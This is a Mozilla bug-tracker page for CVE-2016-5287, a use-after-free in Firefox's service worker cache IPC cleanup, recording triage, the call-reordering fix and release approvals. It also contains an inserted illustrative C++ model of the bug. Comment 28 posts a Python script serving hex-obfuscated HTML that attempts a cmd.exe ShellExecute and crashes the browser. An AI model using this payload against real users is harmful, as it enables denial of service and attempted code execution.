Bug 1309823 (CVE-2016-5287)

Crash in nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors

RESOLVED FIXED in Firefox 49

Status

Core
DOM: Service Workers
--
critical
RESOLVED FIXED
a year ago
7 months ago

People

(Reporter: philipp, Assigned: bkelly)

Tracking

(4 keywords)

49 Branch
mozilla52
x86
Windows
crash, regression, sec-high, testcase-wanted
Points:
---

Firefox Tracking Flags

(firefox49+ fixed, firefox-esr45 unaffected, firefox50+ fixed, firefox51 fixed, firefox52+ fixed)

Details

(crash signature)

Attachments

(2 attachments)

(Reporter)

Description

a year ago
This bug was filed from the Socorro interface and is report bp-6e8fc599-f021-4b0c-b5a3-cda7d2161013.
=============================================================
Crashing Thread (27)
Frame 	Module 	Signature 	Source
0 	xul.dll 	nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::SwapArrayElements<nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator>(nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>&, unsigned int, unsigned int) 	obj-firefox/dist/include/nsTArray-inl.h:346
1 	xul.dll 	nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>::SwapElements<nsTArrayInfallibleAllocator>(nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>&) 	obj-firefox/dist/include/nsTArray.h:1661
2 	xul.dll 	mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors(nsTArray<mozilla::ipc::FileDescriptor>&) 	ipc/glue/FileDescriptorSetChild.cpp:28
3 	xul.dll 	mozilla::ipc::`anonymous namespace'::CleanupIPCStream 	ipc/glue/IPCStreamUtils.cpp:183
4 	xul.dll 	mozilla::ipc::AutoIPCStream::~AutoIPCStream() 	ipc/glue/IPCStreamUtils.cpp:343
5 	xul.dll 	mozilla::UniquePtr<mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete<mozilla::ipc::AutoIPCStream> >::reset(mozilla::ipc::AutoIPCStream*) 	obj-firefox/dist/include/mozilla/UniquePtr.h:342
6 	xul.dll 	mozilla::dom::cache::AutoChildOpArgs::~AutoChildOpArgs() 	dom/cache/AutoUtils.cpp:141
7 	xul.dll 	mozilla::dom::cache::Cache::Put(mozilla::dom::RequestOrUSVString const&, mozilla::dom::Response&, mozilla::ErrorResult&) 	dom/cache/Cache.cpp:421
8 	xul.dll 	mozilla::dom::CacheBinding::put 	obj-firefox/dom/bindings/CacheBinding.cpp:873
9 	xul.dll 	mozilla::dom::CacheBinding::put_promiseWrapper 	obj-firefox/dom/bindings/CacheBinding.cpp:893

This signature is regressing in 50.0b builds and is mainly happening in the content process. In 50.0b6 they currently account for 3% of all content crashes.

Some correlations for the signature on 50.0b:
(100.0% in signature vs 00.23% overall) address = 0xffffffffe5e5e5e9
(81.98% in signature vs 21.36% overall) "EGL?" in app_notes = true
(81.98% in signature vs 21.96% overall) "WebGL?" in app_notes = true
(100.0% in signature vs 40.37% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ
(72.97% in signature vs 20.35% overall) "EGL+" in app_notes = true
(80.18% in signature vs 27.71% overall) dom_ipc_enabled = 1
(72.97% in signature vs 20.83% overall) "WebGL+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context?" in app_notes = true
(Reporter)

Comment 1

a year ago
The crash first started to appear on 2016-10-10 with various different beta versions though, so some external factor may play into this as well.
(Reporter)

Comment 2

a year ago
Based on https://bugzilla.mozilla.org/show_bug.cgi?id=1283823#c26 it may be that the e5e5e5e part of the address is indicative of a security issue, so I'm flagging this as a precaution.
Group: core-security
Flags: needinfo?(dveditz)
Not very useful (very generic) stack, but looks like UAF and something to do with workers and maybe the SW cache.
Group: core-security → dom-core-security
Component: General → DOM: Workers
Flags: needinfo?(dveditz) → needinfo?(bkelly)
Keywords: sec-high, testcase-wanted
Maybe the URLs in the crashes will be useful if this hit different build IDs around the same time.

Lots of zalora.co.id
Component: DOM: Workers → DOM: Service Workers
(Assignee)

Comment 5

a year ago
I would have guessed this was introduced in bug 1093357, but that landed in FF49.

I think I see the problem, though:

      if (!aConsumedByIPC) {
        Unused << fdSetActor->Send__delete__(fdSetActor);
      }

      // FileDescriptorSet doesn't clear its fds in its ActorDestroy, so we
      // unconditionally forget them here.  The fds themselves are auto-closed in
      // ~FileDescriptor since they originated in this process.
      fdSetActor->ForgetFileDescriptors(fds);

We should delete the actor after telling it to forget its file descriptors.
Assignee: nobody → bkelly
Status: NEW → ASSIGNED
Flags: needinfo?(bkelly)
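The ordering problem quoted in comment 5 (and the reasoning in comment 11 that Send__delete__() can free the actor immediately), modelled as an added example that is not Firefox code: a same-process stand-in for the actor plus a debug liveness set, so the wrong order is reported instead of reading freed memory. FdSetActor, gLiveActors, CleanupBuggy, CleanupFixed and RunScenario are constructed names for illustration.

```cpp
// Added example, not Firefox code: a single-process model of the ordering bug
// quoted in comment 5.  FdSetActor, gLiveActors, CleanupBuggy, CleanupFixed and
// RunScenario are constructed names used for illustration only.
#include <cstddef>
#include <set>
#include <utility>
#include <vector>
struct FileDescriptor { int fd; };   // stand-in for mozilla::ipc::FileDescriptor

// Stand-in for FileDescriptorSetChild: the actor owns the fds until either the
// stream is serialized over IPC or cleanup takes them back.
struct FdSetActor {
    std::vector<FileDescriptor> mFds;
    void ForgetFileDescriptors(std::vector<FileDescriptor>& aFds) { aFds.swap(mFds); }
};

// Debug lifetime tracker so the wrong ordering is reported rather than executed.
// In Firefox the freed actor is poisoned with 0xe5 by jemalloc, which is why the
// crash address in the description is 0xffffffffe5e5e5e9 rather than a clean trap.
static std::set<const FdSetActor*> gLiveActors;

FdSetActor* NewFdSetActor(std::vector<FileDescriptor> aFds) {
    FdSetActor* actor = new FdSetActor{std::move(aFds)};
    gLiveActors.insert(actor);
    return actor;
}

// Send__delete__() on an IPDL child actor can destroy it immediately; the model
// always does, which is the case comments 5 and 11 describe.
void Send__delete__(FdSetActor* aActor) {
    gLiveActors.erase(aActor);
    delete aActor;
}

enum class CleanupResult { Ok, UseAfterDelete };

// Same order as the snippet in comment 5: delete first, then use the actor.
CleanupResult CleanupBuggy(FdSetActor* actor, bool aConsumedByIPC,
                           std::vector<FileDescriptor>& fds) {
    if (!aConsumedByIPC) Send__delete__(actor);           // actor is freed here
    if (!gLiveActors.count(actor)) return CleanupResult::UseAfterDelete;
    actor->ForgetFileDescriptors(fds);                    // real code would read freed memory
    return CleanupResult::Ok;
}

// The fix in attachment 8800794: take the fds back while the actor is alive,
// then start its destruction.
CleanupResult CleanupFixed(FdSetActor* actor, bool aConsumedByIPC,
                           std::vector<FileDescriptor>& fds) {
    if (!gLiveActors.count(actor)) return CleanupResult::UseAfterDelete;
    actor->ForgetFileDescriptors(fds);
    if (!aConsumedByIPC) Send__delete__(actor);
    return CleanupResult::Ok;
}

// Runs one cleanup variant over an actor holding two constructed fds and returns
// the result plus how many fds were handed back to the caller.
std::pair<CleanupResult, std::size_t> RunScenario(bool useFixed, bool consumedByIPC) {
    FdSetActor* actor = NewFdSetActor({{3}, {4}});
    std::vector<FileDescriptor> fds;
    CleanupResult r = useFixed ? CleanupFixed(actor, consumedByIPC, fds)
                               : CleanupBuggy(actor, consumedByIPC, fds);
    if (gLiveActors.count(actor)) Send__delete__(actor);  // IPC-owned path frees it later
    return {r, fds.size()};
}
```

The consumed-by-IPC path never hits the bug in either variant, which matches the page's observation that only some cache operations (Cache::Put in the reported stack) crashed.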
(Assignee)

Comment 6

a year ago
Sylvestre, if we do a point release for FF49, I'd like to have this ride-along.  I will have patches up shortly.
Flags: needinfo?(sledru)
(Assignee)

Comment 7

a year ago
Created attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

I think this is a pretty clear ordering violation.  We must call the method on the actor before starting its deletion.
Attachment #8800794 - Flags: review?(wmccloskey)
Attachment #8800794 - Flags: review?(wmccloskey) → review+
OK, we are discussing a dot release for a JS issue; redirecting to Liz.
Flags: needinfo?(sledru) → needinfo?(lhenry)
This bug has 49 as unaffected. So it doesn't sound like a candidate for a dot release. 

Also, this should have sec approval though before it lands if you think 51/52 are also affected.
Flags: needinfo?(lhenry)
(Assignee)

Comment 11

a year ago
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Moderately difficult.  They would have to understand the implication that Send__delete__() can immediately delete an actor and how this ipc/glue code is called.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

I don't think the commit message includes any more information than the patch.  It references "destruction", but I am moving a method that includes "delete" in its name.

Which older supported branches are affected by this flaw?

FF49+

If not all supported branches, which bug introduced the flaw?

Bug 1093357

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

This should apply cleanly.

How likely is this patch to cause regressions; how much testing does it need?

Minimal risk.  It's reordering two calls.  We've fixed similar bugs in the past with changes almost identical to this.

I've also done a try build with an obscured patch name/message:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=e9f99b26d967bfbbd91485cf503dbb78d9aaa429
Attachment #8800794 - Flags: sec-approval?
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-aurora?
(Assignee)

Comment 12

a year ago
Liz, it was marked 49 unaffected because the crashes are not showing there.  The bug that introduced the flaw did land in FF49, though.  If no other point release was happening I probably would not push for one.  But I think it would be prudent to do this as a ride-along.
Flags: needinfo?(lhenry)
(Assignee)

Comment 13

a year ago
Based on bug 1093357 I'm going to mark FF49 affected.
status-firefox49: unaffected → affected
sec-approval+ for trunk. We'll need release management approval for Aurora and Beta patches. I'd like to take it there though.
status-firefox49: affected → wontfix
status-firefox52: ? → affected
status-firefox-esr45: --- → unaffected
tracking-firefox50: --- → ?
tracking-firefox51: --- → ?
tracking-firefox52: --- → +
Flags: needinfo?(rkothari)
Attachment #8800794 - Flags: sec-approval? → sec-approval+
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

Sec-high, let's take this on release as well as other branches. I am now aiming a dot release for mid-next week.
Flags: needinfo?(lhenry)
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-release+
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-beta+
Attachment #8800794 - Flags: approval-mozilla-aurora?
Attachment #8800794 - Flags: approval-mozilla-aurora+
Thanks Liz!
Flags: needinfo?(rkothari)
Went ahead and landed this on inbound to be able to uplift to release branches hopefully before the weekend in https://hg.mozilla.org/integration/mozilla-inbound/rev/e62579becf83fb7b8524bba995af9c94b20c4ec9
(Assignee)

Comment 18

a year ago
Per comment 15.

Carsten, thanks for landing!
status-firefox49: wontfix → affected
https://hg.mozilla.org/releases/mozilla-aurora/rev/7bc185ff4e8b
https://hg.mozilla.org/releases/mozilla-beta/rev/752c1320cca5
https://hg.mozilla.org/releases/mozilla-release/rev/6b065281b17b
Blocks: 1093357
status-firefox49: affected → fixed
status-firefox50: affected → fixed
status-firefox51: ? → fixed
tracking-firefox49: --- → ?
Version: 50 Branch → 49 Branch
https://hg.mozilla.org/mozilla-central/rev/e62579becf83
Status: ASSIGNED → RESOLVED
Last Resolved: a year ago
status-firefox52: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla52
Un-track for 51 as it's fixed.
tracking-firefox51: ? → ---
(Assignee)

Comment 23

a year ago
(In reply to Ritu Kothari (:ritu) from comment #22)
> Hi Ben, this is another crash signature that is trending up in Beta50.
> https://crash-stats.mozilla.org/signature/?date=%3C2016-10-17T17%3A10%3A00%2B00%3A00&date=%3E%3D2016-10-10T17%3A10%3A00%2B00%3A00&product=Firefox&version=50.0b&signature=nsTArray_base%3CT%3E%3A%3ASwapArrayElements%3CT%3E%20%7C%20nsTArray_Impl%3CT%3E%3A%3ASwapElements%3CT%3E%20%7C%20mozilla%3A%3Aipc%3A%3AFileDescriptorSetParent%3A%3AForgetFileDescriptors
> 
> Do you think this is a different problem or it should also be fixed with this one?

It should be fixed with the patches landed here.  What beta do we expect this fix to be included in?  I thought it would be in 50b7, but maybe I was confused.
Flags: needinfo?(bkelly)
(Assignee)

Comment 24

a year ago
Ah, I see FF50b7 was built from this push:

https://hg.mozilla.org/releases/mozilla-beta/rev/6efc0964ec62bc4abfdc4cb1dc7cc461c3238634

Which does not seem to include this bug's patch yet.  So I am hopeful both these crashes will be fixed by this patch.
(Assignee)

Comment 25

a year ago
A number of service worker related intermittents seem to have dropped off to zero over the weekend as well.  Hoping that those are all fixed by this.
tracking-firefox49: ? → +
tracking-firefox50: ? → +
Alias: CVE-2016-5287
(Assignee)

Comment 26

a year ago
FWIW there have been no reports of either crash signature since this was released.
I'm adding the second signature here then. It's strange because it stopped abruptly on 2016-10-17.
Crash Signature: [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] → [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescript…
Group: dom-core-security

Comment 28

a year ago
Created attachment 8806996 [details]
firefox.txt

#Exploit Title: Mozilla Firefox 49.0.2 Crash
#2-11-2016
#Author: sultan albalawi
#video :https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater
#it's working with tor browser, you can try
#Tested on:win7
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
host='192.168.88.254'
port=8080
i=0
ban=''  # decorative banner text only; not part of the crash page
print "please wait ...."
htmlcrach=('''\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\x78\x28\x29\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x20\x3d\x20\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x73\x68\x65\x6c\x6c\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22\x29\x3b\x0d\x0a\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x2e\x65\x78\x65\x22\x2c\x20\x22\x63\x64\x20\x43\x3a\x20\x43\x3a\x5c\x5c\x63\x64\x20\x63\x3a\x5c\x5c\x65\x78\x74\x5f\x66\x69\x6c\x65\x20\x6d\x61\x69\x6e\x2e\x65\x78\x65\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x43\x3a\x5c\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x22\x2c\x20\x22\x6f\x70\x65\x6e\x22\x2c\x20\x31\x29\x3b\x0d\x0a\x7d\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x20\x3d\x20\x22\x22\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x20\x2b\x3d\x20\x22\x41\x22\x3b\x0d\x0a\x7d\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x66\x20\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x66\x20\x2b\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x7d\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x74\x69\x74\x6c\x65\x20\x3d\x20\x62\x75\x66\x66\x3b\x0d\x0a\x7d\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d\x0a\x3c\x2f\x61\x3e\x3c\x2f\x62\x6f\x64\x79\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e''')
while i <= 5000:
    i+=1
    ban+=htmlcrach
class Req(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type','text/html')
        self.end_headers()
        self.wfile.write(htmlcrach)
class runHTTP(HTTPServer):
    def __init__(self,host,port):
        ipadd=(host,port)
        HTTPServer.__init__(self,ipadd,Req)
def createfile():
    global filecreate
    filecreate = "test.html"
    open(filecreate, "wb").write(htmlcrach)
    print ('file done: {}').format(filecreate)
def start():
    global filecreate
    ser=runHTTP(host,port)
    print "http://{}:{}/{}".format(host,port,filecreate)
    ser.serve_forever()
createfile()
start()
Flags: needinfo?(madperson)

Comment 29

a year ago
Mozilla Firefox 49.0.1 - Denial of Service
#Date: 15 Oct 2016
https://www.exploit-db.com/exploits/40536/
(Reporter)

Updated

a year ago
Flags: needinfo?(madperson)
Please file a new bug if you think you've found something new.
Flags: needinfo?(sultanalbalawi00)

Comment 31

a year ago
(In reply to Marco Castelluccio [:marco] from comment #30)
> Please file a new bug if you think you've found something new.

I did
https://bugzilla.mozilla.org/show_bug.cgi?id=1314862

thanks
Flags: needinfo?(sultanalbalawi00)